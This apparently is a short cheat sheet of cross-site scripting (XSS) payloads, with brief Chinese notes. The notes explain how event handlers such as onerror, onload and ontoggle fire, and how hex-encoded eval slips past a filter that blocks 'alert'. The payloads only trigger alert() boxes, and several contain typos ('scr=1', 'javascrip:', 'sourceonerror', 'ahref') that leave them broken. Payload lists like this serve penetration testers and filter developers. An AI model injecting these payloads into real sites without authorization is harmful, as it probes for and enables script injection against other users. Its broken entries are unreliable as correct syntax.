xss payload
<script>alert(xss)</script>
<img scr=1 onerror=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')
<a href=javascrip:alert("xss")>s</a> 点击s时运行alert('xss')
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>过滤了alert来执行弹窗
onclick='alert(/fuck/)
<IMG?SRC="javascript:alert('XSS');">
<img src="" "Alert(/test/)">
<img src=x onerror=alert(xss)>
<img src=1 onerror=alert(1)>
是当图片没有找到路径(即src=“路径:可以使相对路径也可以使绝对路径”找不到图片)就会 弹出消息框,显示 1 ,就是onerror=alert(1)起的作用
<img src=1 onerror=alert(1)>
<details/open/ontoggle=alert(1)>
<svg/onload=alert(1)>
<img/src/onerror=alert(1)>
<video/src/onerror=alert(1)>
<script>(alert)(1)</script>
<video><sourceonerror="javascript:alert(1)">
<video/src/onloadstart="alert(1)">
<ahref=javascript:alert(1)>222</a>